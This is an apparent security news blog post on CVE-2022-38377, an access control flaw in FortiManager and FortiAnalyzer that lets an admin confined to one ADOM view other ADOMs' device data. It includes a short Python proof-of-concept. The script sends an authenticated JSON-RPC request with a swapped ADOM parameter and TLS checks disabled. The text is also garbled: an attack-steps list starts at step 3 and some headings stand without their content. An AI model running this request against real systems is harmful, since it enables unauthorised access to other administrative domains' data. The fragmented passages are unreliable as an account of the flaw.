CVE CyberSecurity Database News

CVE-2022-38377 - Breaking Down the FortiManager and FortiAnalyzer Improper Access Control Vulnerability

Poster -

When it comes to enterprise security, Fortinet’s FortiManager and FortiAnalyzer are household names. But in late 2022, a critical vulnerability put organizations at risk: CVE-2022-38377. Let’s dive into what happened, how attackers could exploit it, and what you can do if your systems are affected. This post is crafted in plain, actionable language—no complex technical jargon!

What is CVE-2022-38377?

This is an improper access control vulnerability [CWE-284] affecting both FortiManager and FortiAnalyzer:

The Core Problem

If a remote admin user is authenticated for a specific ADOM (Administrative Domain), they can, in some cases, see device and dashboard info belonging to other ADOMs. In simpler words: a user limited to one security area might peek into others—not supposed to happen!


Reference:
- Fortinet Security Advisory (FG-IR-22-249)

Why is this serious?

ADOMs are designed to segregate admin access. A large company might use ADOMs so an admin in Europe cannot see or touch anything in the US network, for example. CVE-2022-38377 tears down those walls. If breached, this vulnerability lets an attacker jump boundaries and snoop on other sections—breaking trust and potentially exposing critical info.

Be confined (in theory) to a specific ADOM.

3. Send requests or use the web interface/API in a way that bypasses proper checks, letting them access other ADOMs' data.

Practical Exploit Scenario

Suppose an attacker logs in as jane_admin, who should only see "ADOM-A". Through crafted API calls, jane_admin sends a request asking for device info, but changes the ADOM parameter to "ADOM-B". Due to improper access control, the system honors the request and reveals sensitive information.

Below is a simplified pseudocode example for demonstration

import requests

# User's legitimate session cookie after logging in to FortiManager
session_cookie = {'APSCOOKIE_123456789ABCDEF': 'session_token_here'}

# Intended ADOM (assigned to user)
adom = "ADOM-A"

# Maliciously targeting another ADOM
target_adom = "ADOM-B"

url = f"https://fortimanager.example.com/jsonrpc";

data = {
    "method": "get",
    "params": [
        {
            "url": f"/dvmdb/adom/{target_adom}/device"
        }
    ],
    "id": 1,
    "session": "session_token_here"
}

response = requests.post(url, json=data, cookies=session_cookie, verify=False)
print(response.json())

If the vulnerability exists, this code would return the device list for ADOM-B, even though the user is not supposed to access it.

Inventory of managed assets

This could allow broader attacks or even social engineering against your organization’s IT teams.

Immediate Steps

- Update to the latest version as recommended by Fortinet’s advisory.

Takeaway

CVE-2022-38377 is a wake-up call: even the best network security tools can have powerful weaknesses. For security teams, always keep systems patched, restrict admin privileges as much as possible, and keep an eye on the official advisories.

References & Further Reading

- Fortinet Security Advisory (FG-IR-22-249)
- CVE-2022-38377 entry at NVD
- Fortinet Download Center

Timeline

Published on: 11/25/2022 16:15:00 UTC
Last modified on: 12/01/2022 13:28:00 UTC